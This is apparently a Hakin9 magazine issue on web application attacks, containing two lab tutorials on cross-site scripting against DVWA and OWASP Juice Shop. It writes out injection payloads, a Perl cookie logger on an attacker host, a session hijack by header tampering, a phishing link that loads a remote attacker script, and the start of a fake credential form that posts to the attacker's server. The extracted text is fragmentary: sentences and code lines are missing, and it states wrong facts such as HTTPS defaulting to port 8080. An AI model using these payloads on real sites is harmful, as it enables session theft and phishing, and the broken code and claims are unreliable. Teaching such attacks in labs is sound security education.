Web Application Attacks
Web Application Attacks
Web Application Attacks
Editor-in-Chief
Joanna Kretowicz
Proofreaders
[email protected]
Lee McKenzie
Editors:
Hammad Arshed
Marta Sienicka
[email protected] Olivier Caleff
www.hakin9.org
cybersecurity. First, it was the 16th year of spreading cyber security awareness among
institutions, governments, and people in general. We also celebrated the Internet’s 50th
birthday! That’s a big milestone! Did you know that the first message sent contained only
two letters? They were lo (it was supposed to be login, but system only processed the first
two letters) and the system crash during sending process :) But in the end everything
worked out perfectly. And thanks to that, today we can present you yet another edition of
Hakin9!
We decided to focus on one of the most popular topics, Web Application Attacks. We
have a few really amazing articles that will show you a completely different perspective on
this area and hopefully let you understand how specific attacks are performed.
We start with an article presenting one of the most well known attacks, Cross Site
achievements and experience. You can find his articles in many of our editions and each
presents the highest quality possible. This time Washington focused on cross site scripting
attacks and same origin policy. To put his idea in practice, he prepared a lab for your
studies. The article is worth reading through, to later on test its findings in your own lab.
Now that we know a lot more about XSS, we go to the next publication. Helping
customers understand the risks of Cross-Site Scripting attacks through a demo is an article
written by our avid reader, Eduardo Parra San Jose. We will approach XSS attacks from a
findings to customers or the developer team. How to do it? With Eduardo’s help you will
get a great demo which is both understable and effective. It’s a must-have lecture for all
Looking for a more hands-on experience? Hamdi Sevben shared with us his examples of
web application attacks. In this article the focus is on using the Burp Suite (among other
tools) to perform such attacks on a platform created purely to test your skills. With
Hamdi’s help you will level up your web app attack skills in no time.
Knowing how XSS works and what tools are best to use for a web app attack, next we will
read about XML External Entities by Angelo Anatrella. This attack exploits a weakness in
the user's input processing phase, when the web application accepts an XML document
as input. But that’s not all, while reading the article you will analyze the two following
But we are only halfway through the magazine! There are still plenty of articles we have
for you. Another one was prepared by Hubert Demercado and Elzer Pineda. In their case
scenario you will see how they used a technique they came up with that allowed them to
increase the probability of success on obtaining a remote shell. Their goal was to totally
compromise the server by placing obfuscated code that allows bypassing antivirus
detection.
If you prefer different topics, we have something for you as well. Hardware Hacking by
Felipe Hifram, Deivison Franco and Leandro Trindade, to start - the authors, present an
experiment, in which they show how to break/modify the existing hardware on various
examples. We don’t want to spoil the fun, because it’s an extremely engaging lecture.
5
Ever heard about Wardriving? We have something more than a simple tutorial about it for
you. Paul Mellen, our amazing reviewer and author, prepared a massive guide about this
technique. All his materials are based on the latest software and hardware, so everything
is up to date. Trust me, you will enjoy enjoy this article, and we heard rumors a second
part is coming!
There is also an article about OSINT techniques: “How exposed are we on the
System and its flaws, we will once again focus on IoT and its connections to
automotive industry.
It’s a very long edition, but we hope that those tutorials will brighten your
6
7
8
9
Web Application
Attacks – Cross
Site Scripting (XSS)
Washington Almeida
ABOUT THE AUTHOR
Washington Almeida
Washington Almeida is an Electronic Engineer and a Specialist in Law and Information Technology by the
USP Polytechnic School, extension in business development by Fundação Dom Cabral, member of the
United States High Technology Crime Investigation Association and the Italian International Forensic
Association of Information Systems. Author of articles for the magazines of the Brazilian Intellectual
Property Association (ABPI), and the international Hakin9, Pentest Magazine and eForensics, specializing in
information security, hacking and digital forensics where he also contributes as an instructor. Microsoft
Excellence Title as MCSE. More than 25 years of experience, familiar with digital forensic procedures that
comprises digital forensics investigations phases as collection, examination, analysis and reporting. His
excellent technical background has been acquired through consistent support in cases involving the social
media environment, instant messaging, droppers, ransomware, copyright infringements, e-mails system, HR
systems, databases, data theft, bank fraud, computer hacking, Internet applications among others. Cyber
security professional also works with sophisticated systems invasion testing, helping companies improve
the security of their assets. In the assistance of the Justice, he is licensed by the “Tribunal de Justiça de São
Paulo” and “Tribunal Regional do Trabalho da 2ª Região” acting as witness expert appointed by the judge.
11
Web Application Attacks – Cross Site Scripting (XSS)
Legal note:
Exploitation techniques are used by cyber security specialists to find and validate vulnerabilities in the information
technology environment while performing extensive security auditing activities. These experts use such techniques to
diagnose security problems and to detect vulnerabilities on the environments in which they are authorized to
experiment with exploitation tools.
However, experimenting with exploitation techniques on hosts, system and network environments that do not belong
to you and that you are not authorized to use such techniques against constitutes illegal activity and it is subject to law
enforcement that can vary from country to country.
This is the reason why all attack interactions are carried out within a controlled environment and isolated from the
internet, ensuring that knowledge is shared without incurring the crime of computer intrusion.
Abstract/Introduction:
Understanding the Cross-Site Scripting (XSS) attack class requires understanding how and why this vulnerability is
present on thousands of web pages around the globe.
When we talk about web page security, there is a concept known as Same Origin Policy (SOP), which forbids that a
web application retrieve content from pages with another origin. This means that by prohibiting access to cross-origin
content, random sites may not be able to read or modify data from your personal page of your social network or other
financial transaction account, for example, while you are connected to them.
Same Origin Policy (SOP) is one of the most important and fundamental principles involved in the security of every
browser. It basically implies that two pages have the same origin if the protocol, port (if specified), and host are the
same for both pages. For better understanding, let's take as an example my website page
https://www.washingtonalmeida.com.br/index.html that can access the content of
https://www.washingtonalmeida.com.br/about.html while the https://xss-attacker.com/index.html page cannot
access the content from https:// www.washingtonalmeida.com.br/about.html. It is easy to see in this example that the
origin is not the same for the pages.
One source is the domain www.washingtonalmeida.com.br while the other source is xss-attacker.com. Now let's take
the example of the page https://www.washingtonalmeida.com.br/index.html. Can this page access the page
http://www.washingtonalmeida.com.br/about.html? The answer is no because they are different protocols, the first
one uses the https protocol while the second one uses a different protocol: http. Now consider the page
https://www.washingtonalmeida.com.br:8181/index.html.
12
Web Application Attacks – Cross Site Scripting (XSS)
Can this page go to https://www.washingtonalmeida.com.br/about.html since in this example they use the same
protocol (https)? The answer is no because these are different ports now, the first one uses port 8181 while the second
one uses the default port, usually port 8080.
In order to have a better understanding of a Same Origin Policy, let us take another example of the following code
present at www.washingtonalmeida.com.br that uses an Ajax request in order to fetch contents of hakin9.org and
display it on www.washingtonalmeida.com.br.
<script>
x.open('GET','http://www.hakin9.org', true)
x.send()
document.write(x.responseText);
</script>
When the javaScript is executed on www.washingtonalmeida.com.br, the SOP restricts it from accessing contents
present at https://www.hakin9.org due to scheme and host mismatch.
A SOP bypass occurs when JavaScript present on one origin say https://www.washingtonalmeida.com.br is able to
access properties of webpage on another origin https://www.hakin9.org such as cookies, location, http response, etc.
Note that this technique is a way of ignoring the concept of SOP in a vulnerable web application. The reader should
have realized that if cookies, which typically contain session identifier information, can be read by the client's
JavaScript code, the attacker could use them in their own browser and log in to the web application as a victim, and for
this reason Cross-site Scripting is regarded as one of the most dangerous attack classes today.
Now that a basic introduction to the principles of SOP has been given, let's see how XSS works in practice.
13
Web Application Attacks – Cross Site Scripting (XSS)
This is one of the most commonly used diagrams by security experts to give insight into how a cross-site scripting class
attack occurs.
3. The infected page injects the script into the victim's browser;
Given the introduction, let's see in practice how the attack happens.
The idea of presenting the lab is purely motivational, as any web security student can build their own lab and try to
repeat the content presented in this article. The learning comes from persistent application of the techniques and
continuous and dedicated study time to understand the mechanisms involved in each class of attack.
Equipped with Microsoft Internet Information Services web server and assigned IP address 192.168.1.7.
14
Web Application Attacks – Cross Site Scripting (XSS)
Wash machine, the attacker machine, is equipped with one of the most advanced penetration tests based on Linux
distribution used for Penetration Testing, Ethical Hacking and network security assessments. It is assigned the IP
address 192.168.1.18 and Apache web server.
The vulnerable web server is the famous DVWA. DVWA stands for Damn Vulnerable Web Application, which is a
PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test
their skills and tools in a legal environment. The vulnerable web server is assigned the IP address 192.168.1.42.
The simple design of the Wash lab is shown in the figure below.
Scenario:
The web server administrator (192.168.1.7) has logged on to the server (192.168.1.42) and the hacker (192.168.1.18)
knows that this web server is vulnerable to the XSS attack class.
In the Admin authentication process, an authentication token is generated, and we want to investigate which active
user session that token relates to.
Cross-site Scripting is extremely dangerous because if a site is vulnerable to it, it is literally possible to steal this active
session by using the authentication cookie (token). Let's look at the steps of the attack.
15
Web Application Attacks – Cross Site Scripting (XSS)
In the reflected method of XSS, there is usually a field where the visitor can interact with the site, as shown in the
following figure.
The field prompts the visitor to enter their name, but what prevents them from using this field for other interactions?
OK, everyone, let's first enter my name in the field and check how the web server responds.
As a result, we found that a statement with my name is displayed in red color just below the field where I entered my
name.
OK, so far we see the expected operation for the purpose of the field, and the code should allow no more than that.
Now let's try to echo a popup with another data entry in this field. The code I will enter will be exactly this:
<script>alert('XSS-Reflected')</script>
16
Web Application Attacks – Cross Site Scripting (XSS)
At this moment, it's easy to see that the attacker can easily insert JavaScript code that would run under the site's
context. By doing so, the attacker can access other pages on the same domain and can read data, like CSRF-Tokens or
the set cookies. In both cases, the attacker will be able to steal the active session from the user that suits him and, of
course, what best meets the hacker's expectations is the root or admin account.
In the case of cookies, which typically contain session identifier information, it can be read by the client-side
JavaScript code, and the attacker can use them on his own browser and login to the web application as the victim. If
that does not work, the attacker can still read private information from the pages, such as read CSRF-Tokens and
make requests on behalf of the user.
Let's inject another script into the vulnerable page. The script code is:
<marquee><h1>Washington Almeida</h1></marquee>
And the result shown in the following figure is displayed after clicking the "Submit" button.
Note that the script code is reflected in the vulnerable page and hence the name Cross-Site Scripting Reflected.
Now let's try with another script to get relevant information to perform an attack. The code we will inject is the one
shown in the line below.
<script>alert(document.cookie)</script>
17
Web Application Attacks – Cross Site Scripting (XSS)
And as a result, I received the following information pop up on my screen, the attacker's screen.
On a vulnerable web site with many section cookies, the list of session cookies would be large. The information that goes after the
PHPSESSID tag concerns the active section ID on the website.
Going back to the design of my personal network, remember that on my Kali Linux station I have an Apache server
running and this server is maliciously configured to allow writes to a folder named /var/www/logdir.
My Kali Linux machine has the IP 192.168.1.18 and the next step is to download the active session cookie I found in
order to use all of Kali's arsenal and check if this cookie is from an interesting active session or not.
So, let's build a slightly better script that allows me to transfer a copy of the active session cookie to my Kali Linux
machine whose IP is 192.168.1.18. The script code will be exactly the following line:
When we enter this code in the field and submit it by clicking the "Submit" button, we get the following information as
return of the script execution shown in the figure below:
Note that the script was executed in a different origin and script execution response brings information from the
attacker's computer, making sure that the session cookie was successfully copied at this stage of the attack. If you
notice, you will see that in the field where we typed the resource, we want to access a resource in another origin with
an IP address of IP 192.168.1.18, precisely the IP of the attacker.
This means that from this moment on the hacker has at his disposal information about the session being used by
another user, and he wants to know in the shortest possible time which user is the "owner" of this authenticated
session that he, the attacker, can use to impersonate him by using his credentials for his authenticated cookie. At this
moment this is already clear to the reader that the XSS class attack is an attack known as Man-In-The-Middle Attack.
18
Web Application Attacks – Cross Site Scripting (XSS)
Note that this action of transferring information between sites violates the principle we commented on at the
beginning of the article regarding the Same Origin Policy (SOP) about browser security.
The main actor involved in this process is the logit.pl script, which may vary according to each environment's
peculiarity. For the example shown in this article, the code executed in the Perl script is shown below:
#!/usr/bin/perl
chomp($DATE= `date`);
$dir= "/var/www/logdir";
$file= "$dir/log.txt";
open(LOG,">>$file");
&getDATA;
close(LOG);
sub getDATA
if($ENV{'QUERY_STRING'} ne "")
$buffer = $ENV{'QUERY_STRING'};
elsif($ENV{'CONTENT_LENGTH'} ne "")
19
Web Application Attacks – Cross Site Scripting (XSS)
chomp($buffer = $ARGV[0]);
print "----------------------------------<BR>\n";
$HTTP_REFERER = $ENV{'HTTP_REFERER'};
$value =~ tr/+/ /;
$FORM{$name} = $value;
print "----------------------------------<BR>\n";
#END_OF_THE_SCRIPT_CODE
20
Web Application Attacks – Cross Site Scripting (XSS)
Let us understand some parts of this script, and the rest of which I leave as homework for professionals who I am sure
will make a difference in this challenging market.
The command chomp($DATE= `date`); instructs the system to register the current date. The section that
instructs data to be written to the /var/www/logdir folder is as follows:
$dir= "/var/www/logdir";
There is also the name information that the log will receive when it is written to the attacker's Apache web server,
which is log.txt. Let's have a look at this part of the code:
$file= "$dir/log.txt";
Then we have the folder and filename information generated to access the cookie information. If you list the contents
of the log.txt file right after capturing its contents, you will get the same information you got in figure 8.
The instruction print "Content-type: text/html\n\n"; will print HTML if tested from a browser.
The line open(LOG,">>$file"); will open Log File in appended mode. In the Perl language when you open a file in
appended mode it means you can open the file for appending new content to the existing content of the file.
The &getDATA command will obey the instructions contained in the sub getDATA statement.
Note that all Perl script statements end with a semicolon. This semicolon works with the ENTER key, which forces
commands to execute line after line.
Once the attacker has done what was expected he could not have done, i.e. made a copy of the session machine's
session cookie, now is the time to find out who is the user who owns that session he intends to hijack.
#!/usr/bin/perl
chomp($DATE= `date`);
$dir= "/var/www/logdir";
$file= "$dir/log.txt";
open(LOG,">>$file");
&getDATA;
close(LOG);
21
Web Application Attacks – Cross Site Scripting (XSS)
sub getDATA
if($ENV{'QUERY_STRING'} ne "")
$buffer = $ENV{'QUERY_STRING'};
elsif($ENV{'CONTENT_LENGTH'} ne "")
chomp($buffer = $ARGV[0]);
print "----------------------------------<BR>\n";
$HTTP_REFERER = $ENV{'HTTP_REFERER'};
$value =~ tr/+/ /;
$FORM{$name} = $value;
print "----------------------------------<BR>\n";
22
Web Application Attacks – Cross Site Scripting (XSS)
#END_OF_THE_SCRIPT_CODE
Talking a little about cookies, they are generally used by web servers to keep state information at the client's side. The
server sets cookies by sending a response line in the headers that looks like Set-Cookie: <data> where the data
part then typically contains a set of NAME=VALUE pairs (separated by semicolons like security=VALUE1;
PHPSESSID=VALUE2;). The server can also specify for what path the "cookie" should be used for (by specifying
path=value), for what domain to use it (domain=NAME) and if it should be used on secure connections only (secure).
To make use of this information we use the combination of two commands. One is the most sophisticated line
command for data manipulation: the curl command. The other is the egrep command.
First, we use the curl command to manipulate passive read information and format it into a specific file, in this case I
want to use the HTML format.
When you use the CURL command specifying the -b clause, you enable "cookie recognition", and that is all that needs
to be done at this time. Before launching the curl command line, the attacker looks closely at the contents of the log.txt
file that he captured in the process, the contents of which are shown in figure 8. Figure 9 shows the complete
command line used to transfer the cookie session information from the host 192.168.1.42 to the attacker host
192.168.1.18.
Note that the curl command performs a copy of the data in HTML format, which was generated by including the
redirect character ">" before the output file name.
And in Figure 10 we can prove the existence of the login.html file, which has the active session authentication cookie
information.
Having the login.html file is time to use the egrep command line. Egrep is an acronym for "Extended Global Regular
Expressions Print", which means it is a program that scans a specified file line by line, returning lines that contain a
pattern matching a given regular expression. Only as extra information, running egrep in Unix/Linux environment is
equivalent to running the command grep with the -E clause.
23
Web Application Attacks – Cross Site Scripting (XSS)
In this context, if we wish to obtain user information, we include the expression "Username:". If we want to bring in
the security level information that is present in the file, we include the expression "Security Level:". If we want both
pieces of information, we separate the instructions with a pipe symbol "|", as shown in the figure below.
We are now at the session hijacking stage, but to hijack the admin session we need to change the HTTP header to enter
PHPSESSID information and Security Level information. This task is accomplished through an extension known as
Tamper (Tamper data, Tamper Chrome, etc.). So, we need to start the Tamper extension from the Firefox menu,
Iceweasel in the case of my Kali Linux machine. See the figure below:
After starting the Tamper extension, it will interrupt the page load by asking the attacker if he wants to change the
header information.
24
Web Application Attacks – Cross Site Scripting (XSS)
By clicking the tamper button, a dialog screen opens allowing the attacker to manipulate the header information,
replacing all or part of the data. In our case, we want to change the PHPSESSID and Security Level information.
This previously captured information is overwritten in Tamper's dialog box, allowing the landing page session to open
with different information than would normally be used by visitors.
Then, while downgrading security, the attacker populates the value of the PHPSESSID parameter with the Admin user
session information and clicks OK to start the session hijacking.
25
Web Application Attacks – Cross Site Scripting (XSS)
The page loads normally, however, with the admin user session, as we see in the picture below:
Cross-Site Scripting attacks are essentially code injection attacks into the various interpreters in the browser. These
attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash, and other client-side languages with the
objective to gather data from account hijacking, changing of user settings, cookie theft/poisoning and others.
It is not that easy to protect against XSS attacks because there are a number of factors to be considered for protection.
The main problem is that we have to deal with a wide variety of inputs and their valid strings. In this article, we saw
only two in a very didactic format to give the reader visibility and understanding of the problem. We can bypass most
XSS filters by encoding our XSS with different character sets, different character representations and even with media
file types such as JPEG, MP3, MOV, etc. Remember that media files can hide XSS payloads.
Periodically review your company's information security policies. Before the concern was the network, today we are
concerned about the cloud, the IoT devices, among others, and the company's security policy is contemplating this
rapid evolution?
26
Web Application Attacks – Cross Site Scripting (XSS)
Simulate intrusion tests to assess potential vulnerabilities that may expose the company assets to the risk of
cyber-attacks.
Keep practicing and learning new techniques. If you run out of things to learn, go back to Exploits Database by
Offensive Security and look at the latest exploits. You will end up finding new hacking techniques that you can
incorporate into your growing tool kit.
Summary:
One of the most fundamental defenses against exploitation techniques and the tools used to compromise systems is
the ability to protect the corporations’ assets against these threats.
The patches, also known as fixes, are intended to remedy these vulnerabilities as soon as they are revealed and are
often distributed in software updates. Hence, it is vital to keep your software up to date to make sure that all known
vulnerabilities are patched.
If the company implements a poor-quality web application development policy, resources could be compromised, and
data exposed to the Internet. It is the responsibility of companies to develop secure web solutions as well as
professionals who provide services to implement these security features for companies.
In times of the complex landscape of data breach laws, such as EU’s GDPR, Canada’s PIPEDA and Brazil’s General
Data Protection Law, if the compromised user session has elevated privileges within the application, as we could see in
this article, then the impact will generally be critical, allowing the attacker to take full control of the vulnerable
application and compromise all users and consequently their data.
27
Helping customers
understand the
risks of Cross-Site
Scripting attacks
through a demo
Eduardo Parra San Jose
ABOUT THE AUTHOR
cybersecurity specialization.
29
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
Introduction
Communication is key to raise the awareness of our customers and help them understand why it’s important to fix the
vulnerabilities present in their assets.
What I have noticed so far when reporting web vulnerabilities through a report is that customers don’t take the reports
seriously enough. Most of the time, I am the one to blame because I wasn’t showing the customer or the customer’s
developer team any real examples on how an attacker can take advantage of the vulnerability to compromise the
confidentiality, integrity and/or availability of their assets. In the case of cross-site scripting, the attack targets their
most important asset, their clients. Raising awareness and helping a customer understand what risks are associated
with a vulnerability, I believe, are the best cards we have to play when it comes to preventing web application attacks.
So in this article, instead of showing just an alert box as a proof of concept and then a bunch of text describing the
impact of cross-site scripting attacks, I would like to share a demo that has helped me to better communicate the
impact of cross-site scripting attacks to our customers and their developer teams..
The idea is to start by making a brief, informal high-level introduction to cross-site scripting attacks and then code
some easy, reproducible example that I hope will help show your customers why it is important to fix the findings in
the reports we deliver to them.
A cross-site scripting attack, also known as XSS attack, happens when someone is able to take advantage of a
vulnerability in a web application to run JavaScript code in the victim’s web browser.
Cross-site scripting attacks should be taken into account because, as web browsers do not apply the Least Privilege
Principle and grant all the scripts in a site the same level of privileges, no matter where the script comes from or who
put it there, the attacker’s JavaScript code will get the same privileges as the legitimate scripts in the web site.
JavaScript code allows control of anything a web browser can do, such as change the visual aspect of a site, modify the
URL, add and delete entries in the web browser’s history, perform actions on behalf of an authenticated user or
download and execute malicious JavaScript code from any other web server.
• Stored
It happens when the vulnerability allows the attacker to store the JavaScript code in the web application
database. This is the worst scenario as the attack will target all the users who visit the affected part of the web
site. For example, think of an online store, if the vulnerability is found in a product’s comment field, the attack
will target all the users that visit the product page.
30
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
• Reflected
It happens when the vulnerability allows the attacker to execute JavaScript code included in an HTTP Request.
The JavaScript code can be inserted in an HTTP header, query string parameter or body parameter. For
example, think again of an online store that has a vulnerable search form; if instead of searching for a product,
a user inserts JavaScript code as a search term, and the search term is displayed on the screen after the search
is done, the JavaScript code that was injected as a search term will be executed.
• DOM-Based
It happens when there is a vulnerability in the web site’s JavaScript code that allows the attacker to manipulate
it and execute its own JavaScript code. It can be either reflected or stored. The vulnerability that leads to
DOM-XSS attacks is not in the server-side code that handles the HTTP request, but in the client-side code of
the web application. For example, think of a documentation section of a web application or an online book;
there could be an index that once it is clicked it takes us to a specific part of the documentation without
refreshing the page or making any HTTP request. In some of these cases, when the section name appears in the
URL after a hash symbol, what the application usually does is retrieve the content after the hash symbol:
https://anawesome.book/#chapter1
In this example, chapter 1 takes us to that part of the page. If we change the content after the hash for some
JavaScript code:
https://anawesome.book/#<script>console.log(“notexpected”)</script>
it could result in the execution of the JavaScript code if no validation is in place.
At the end of this article, I will leave you what I found to be some good reference tutorials that can not only help dig
deeper into cross-site scripting attacks, but to try them out in a lab environment.
To perform the demo, let’s first set up the environment. As a vulnerable web application, we will deploy the OWASP
Juice Shop version 7.5 to Heroku and for the attacker’s web server we will use Codeanywhere. I have chosen these
resources because both services are great for learning and do not require a credit card in the sign up process. Let’s
start deploying the OWASP Juice Shop to Heroku.
Heroku
https://www.heroku.com/
31
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
Next, we fill in the form and press the CREATE FREE ACCOUNT button:
After clicking the button, the following screen will indicate that we must confirm our email address:
32
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
To activate the Heroku account, we click on the link received in the confirmation email:
Next, we setup a password and then press the SET PASSWORD AND LOGIN button:
33
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
Finally, we click the CLICK HERE TO PROCEED button to log into Heroku:
https://github.com/bkimminich/juice-shop/tree/276cb9773a70a3fa471c43be66c4de4c21024c13
To deploy it to Heroku, we scroll down until the Deploy to Heroku button shows up and then we click on it:
34
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
After clicking the button, it will take us to Heroku. Then we have to press the Deploy app button:
35
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
36
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
If at any time we want to stop the application, we can press the Manage App button:
click on Settings:
37
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
For now, we leave the Maintenance mode off, so we can use the OWASP Juice Shop.
Codeanywhere
Now that we have our OWASP Juice Shop up and running, let’s go to Codeanywhere:
https://codeanywhere.com/
38
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
Next press the Try Now button of the Free Trial plan:
In the form, we enter an email and a password and then click on the Register button:
39
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
After clicking the button, the following screen will indicate that we must confirm our email address:
In this case, the email was in the Junk folder. Once I found it, I selected the link text, right clicked on it and then
clicked on the option to follow it (you can also copy the link and paste it in a new tab):
Now your account is verified and you can click on the ‘Click here’ link to access the editor:
40
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
A Connection Wizard will pop up. From all the available stacks, we choose PHP on Ubuntu 16.04. Then give our
environment a name and finally click on the CREATE link:
41
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
Once it is deployed, if we scroll down a little, we will see the link of our application’s domain and if we click on it:
To check that everything works as expected, let’s right click on the environment name under connections and select
Create File from the menu:
42
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
The code just prints It works! to the screen. Save the file either by pressing Ctrl+S or going to the File menu, and then
access the file from the web server:
43
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
Now that we have the environment up and running, let’s do the demo. In this demo we are going to show how to take
advantage of a vulnerability in the client-side JavaScript code to perform a cross-site scripting attack. In this attack:
• The code in the script will modify the visual aspect of the current page
• The script that contains the code will be downloaded from an external web server, the web server in
Codeanywhere
One of the first tasks to perform when auditing a web application is to crawl or spider the web site to find the linked
files and directories of the web application. This action can help discover interesting spots for further testing such as
web forms.
In this case, we can find a search form in the navigation bar at the top of the page:
We can also see in the URL that the search path is after a hash sign:
The part starting at the hash sign is known as the fragment of the URL and it is a part that is usually handled by
client-side JavaScript code. To better understand how the search form works, let’s press F12 to open the browser’s
developer tools and click on the Network tab:
44
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
Then let’s type a search term in the box, such as apple, and click the Search button:
After clicking the button, we will be able to notice that the web page is not refreshed. Instead, we can see in the
network tab that an HTTP Request has been performed using JavaScript code:
Another interesting thing we noticed is that even though the web page is not refreshed, the search term (apple) is
displayed next to Search Results words on the screen:
Therefore, there is client-side JavaScript code modifying the contents of the page. If we click on the request, we will be
able to see the URL of the request:
45
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
And if we open the URL in a new tab, we will be able to see that the request returns data in JSON format:
This data is requested or retrieved using client-side JavaScript code and, as the page is not refreshed, we know that the
data is processed using client-side JavaScript code. So, if there is a vulnerability that leads to a cross-site scripting
attack, the type of the XSS will be DOM-Based.
There are multiple ways to insert JavaScript code into a website, but probably one of the most known ones is to use the
script tags of the HTML language. Let’s try to insert a simple alert box that most people use for testing. We type the
code into the search form and then press the Search button:
And as we see, the JavaScript code gets executed triggering an alert box:
which means that the developer is not only not filtering the input we sent, but also not escaping the characters such as
< or > before displaying the code to the screen. After clicking the OK button, we can see that the code we typed gets
embedded into the source of the page:
46
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
As you all probably know, the script tag of the HTML language does not only allow you to execute the JavaScript code
within the script tags, but also load a script from any other web server using the src attribute. To test it, let’s go to
Codeanywhere, right click on the container and select Create File from the menu:
Once the file is created, we can start coding. The first thing we are going to do is to isolate our JavaScript code to avoid
issues with the legitimate JavaScript code in the page. Let’s see an example. Open the web browser’s developer tools by
pressing the F12 key and then click on the Console tab. Here you can play with JavaScript code. Let’s declare a variable
named x and then try to declare another variable named x. As the variable x has already been declared, the second
time you try to declare it, the following error is triggered:
47
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
So, in our code, if we name a variable div, and in the legitimate code there is another variable called div, our code
won’t work as we cannot declare a variable that has already been declared. To avoid conflicts like this one, instead of
using global variables, which is a very bad practice, we will create a function that will be immediately invoked
containing all the variables. As JavaScript has function scope, all the variables created inside the function will not
create a conflict with the variable outside the function. To immediately invoke a function, you have to surround the
function within parentheses and then put another parenthesis:
Save the file. Then go to OWASP Juice Shop and in the search form, use the HTML script tags with the src attribute to
load our script like this:
<script src="https://<codeanywhere.domain>/<scriptName>"></script>
In my case, it is:
<script src="https://h9demoxss-h9articlexss483243.codeanyapp.com/h9demo.js"></script>
48
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
And as we can see, our JavaScript code gets executed after being downloaded from the web server we have in
Codeanywhere:
If we open the developer tools (F12), we can see the code is injected in the page:
So, we have just showed one thing to the customer, this vulnerability allows you to load JavaScript files from any
server the attacker wants. We can also deliver this attack to anyone by simple sharing the following link through a
phishing email, comment section of a web page or through a web site coded specifically for that purpose:
https://h9demoxss-juice-shop.herokuapp.com/#/search?q=<script+src="https://h9demoxss-h9articlexss483243.co
deanyapp.com/h9demo.js"></script>
Let’s go back to Codeanywhere. Next, we are going to show the customer how we can add entries to the browser
history and modify the URL. The web browser allows us to add entries in the browser’s history using the history API.
We cannot change the domain, but we can change the path or the URL to be whatever we want. The function of the
browser’s history API that allows us to do this is called pushState. The first two arguments of the pushState function
can be ignored (set to an empty string) for our purposes and the third one is the new path we want to figure in the URL
and in the browser’s history. So right now, the path in our URL clearly shows the script tag:
49
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
For example, let’s change the path to /account/verification. To do so, let’s delete the alert box from our code and
include:
And again, save the file, go to OWASP Juice Shop and in the search form, use the HTML script tags with the src
attribute to load our script. Finally press the Search button:
And even though we haven’t refreshed the page (remember the search is done using JavaScript code to perform the
request), we can see a new entry in the web browser’s history list:
So, we have demonstrated that, besides downloading scripts from external sources, an attacker can use JavaScript
code to alter the URL and the web browser’s history.
50
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
Next, we are going to modify the visual aspect of the web page. For example, let’s put a semi-transparent layer in front
of the Juice Shop. The idea is to create a section or a div element, give it some CSS properties from JavaScript and
then place the element inside the body tag. But let’s go step by step.
We can create HTML elements by using the document.createElement function. For example, if we want to create a div
element, we can do:
We can apply CSS properties to the element using the style property like this:
div.style.width = "100%";
So, let’s make our layer. We want our div element to take all the screen with:
div.style.width = "100%";
div.style.height = "100vh";
vh stands for viewport height (the entire browser’s window). We also want our div to be positioned at the top left of the
screen. To do so, we set the position as absolute:
div.style.position = "absolute";
div.style.top = 0;
div.style.left = 0;
Next, we want to bring our div element to the front of the page and the element that is at the front is the one in which
the z-index value is higher. Therefore, we give a pretty high value to the CSS z-index property:
div.style.zIndex = 99999;
Finally, to make it transparent, let’s give the element a white half-transparent color. To do so, we are going to use the
background CSS property with RGBA colors. RGBA stands for Red Green Blue Alpha. Red, Green and Blue means the
value of these colors range from 0 to 255. The higher the value, the more of that color. To get white, we have to give the
highest value to all of them. The alpha value ranges from 0 to 1 and indicates how much transparency you want. In our
case, we will use 0.5. So, the code will look as follows:
51
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
Finally, let’s append a div element as a child of the body element using the appendChild function like this:
document.body.appendChild(div);
And as we did before, save the file, go to OWASP Juice Shop and in the search form, use the HTML script tags with the
src attribute to load our script. Finally press the Search button:
And you will see the JavaScript code is executed and the whole page gets covered by a semi-transparent white layer:
Therefore, this demonstrates that we are able to change the visual aspect of the web page. However, this is not very
useful. What if we add a web form inside of our div asking for the user’s credentials?
To do so, we will follow the same procedure, create the form element and then append it inside the div. I apologize, I’m
pretty far from being a CSS pro, so the style of the form will not be great, but it will illustrate our point. Let’s start
coding the form by creating the HTML element just like we did before:
52
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
• action
the URL of the server-side script that will handle the form
• method
the HTTP method to be used
To set these attributes, we can use the setAttribute method of the form element we have just created. First, set the
method attribute. In this case, it doesn’t matter whether you use GET or POST because we will submit the form using
JavaScript code:
form.setAttribute("method", "post");
Then set the action attribute. The URL will point to a PHP script called credentials.php that we will code right after the
form:
form.setAttribute("action",
"https://h9demoxss-h9articlexss483243.codeanyapp.com/credentials.php");
but you can name it whatever you like. Then let’s style the form a little bit. The idea is to make the form and its
elements stand out. For example, set the width to be 40%:
form.style.width = "40%";
Next, let’s set the margin top and the margin bottom to 20px and, for the left and right margins, use the auto keyword
to center the form on the screen:
The padding property defines the inner margins of the form. As we’ll add a border to our form, let’s add some space
between the border and the child elements of the form. For example, 20 pixels:
form.style.padding = "20px";
Finally, to see the form area and make the form stand out, we define a border:
53
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
Now let’s create the HTML elements that will be inside the form. For example, let’s put a heading tag to indicate to the
user that an account verification is needed. The steps are the same; we create the HTML heading element. An h1 in
this case:
and then style it a little bit. Set the text color to red:
formTitle.style.color = "red";
formTitle.style.textAlign = "center";
Next, let’s create the input fields of the form to request the user’s username and password. Let’s start creating the
input element for the username:
